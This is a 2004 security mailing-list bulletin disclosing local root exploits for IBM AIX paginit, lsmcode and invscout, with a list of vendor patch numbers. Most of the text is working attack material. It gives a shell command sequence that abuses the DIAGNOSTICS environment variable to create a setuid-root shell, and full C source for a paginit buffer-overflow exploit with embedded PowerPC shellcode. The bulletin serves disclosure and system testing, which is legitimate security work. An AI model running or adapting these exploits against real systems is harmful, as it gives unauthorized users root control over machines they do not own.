Date: 21 Dec 2004 18:12:22 +0200
From: SecuriTeam <support@securiteam.com.>
To: [email protected]Subject: [EXPL] AIX paginit, lsmcode and invscout Local Exploits
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
AIX paginit, lsmcode and invscout Local Exploits
------------------------------------------------------------------------
SUMMARY
The following exploit codes can be used to test your system for the
vulnerabilities in paginit, lsmcode and invscout that we partly reported
about in our previous advisory:
<http://www.securiteam.com/unixfocus/6O00N0AC0A.html>; IBM AIX invscout
Local Command Execution Vulnerability.
DETAILS
Vulnerable Systems:
* IBM's AIX versions 5.1, 5.2 and 5.3
Solution:
The vendor has been contacted and has released the following patches:
1) For the diag bug, bugfix numbers are IY64389(5.1), IY64523(5.2), and
IY64277(5.3).
2) For the paginit bug, bugfix numbers are IY64358(5.1), IY64522(5.2), and
IY64312(5.3).
Diag vulnerability:
There are (at least) 4 broken suid binaries.
-r-sr-xr-x 1 root system 10014 Sep 16 2002 /usr/sbin/lsmcode
-r-sr-x--- 1 root system 2796 Jan 26 2003
/usr/sbin/diag_exec
-r-sr-xr-x 1 root system 450433 Apr 08 2004 /usr/sbin/invscout
-r-sr-xr-x 1 root system 511362 Apr 08 2004
/usr/sbin/invscoutd
All these binaries are exploited the same way: the path set in the
$DIAGNOSTICS environment is used by these binaries to execute
$DIAGNOSTICS/bin/Dctrl as root.
Example:
Executing the following gives a root shell:
mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh
Paginit vulnerability:
The following setuid binary:
-r-sr-xr-x 1 root security 7354 Mar 12 2003 /usr/bin/paginit
Does not do a bounds check on the first commandline argument, which is
supposed to be a username. If you feed paginit the proper data and hit
enter, root priviledges are gained.
Exploit:
/* exploit for /usr/bin/paginit
tested on: AIX 5.2
if the exploit fails it's because the shellcode
ends up at a different address. use dbx to check,
and change RETADDR accordingly.
cees-bart <ceesb@cs.ru.nl.>
*/
#define RETADDR 0x2ff22c90
char shellcode[] =
"\x7c\xa5\x2a\x79"
"\x40\x82\xff\xfd"
"\x7c\xa8\x02\xa6"
"\x38\xe0\x11\x11"
"\x39\x20\x48\x11"
"\x7c\xc7\x48\x10"
"\x38\x46\xc9\x05"
"\x39\x25\x11\x11"
"\x38\x69\xef\x17"
"\x38\x87\xee\xef"
"\x7c\xc9\x03\xa6"
"\x4e\x80\x04\x20"
"\x2f\x62\x69\x6e"
"\x2f\x73\x68\x00"
;
char envlabel[] = "X=";
void printint(char* buf, int x) {
buf[0] = x >> 24;
buf[1] = (x >> 16) & 0xff;
buf[2] = (x >> 8) & 0xff;
buf[3] = x & 0xff;
}
int main(int argc, char **argv) {
char *env[3];
char code[1000];
char buf[8000];
char *p, *i;
int offset1 = 0;
offset1 = 0; // atoi(argv[1]);
memset(code, 'C', sizeof(code));
memcpy(code, envlabel,sizeof(envlabel)-1);
// landingzone
for(i=code+sizeof(envlabel)+offset1; i<code+sizeof(code); i+=4)
printint(i, 0x7ca52a79);
memcpy(code+sizeof(code)-sizeof(shellcode), shellcode,
sizeof(shellcode)-1);
code[sizeof(code)-1] = 0;
env[0] = code;
env[1] = 0;
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf)-1] = 0;
p = buf;
p += 4114;
printint(p,RETADDR); // try to hit the landingzone
p += 72;
printint(p, RETADDR); // any readable address (apparently not
overwritten)
execle("/usr/bin/paginit", "/usr/bin/paginit", buf, 0, env);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:ceesb@cs.ru.nl.> cees-bart.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
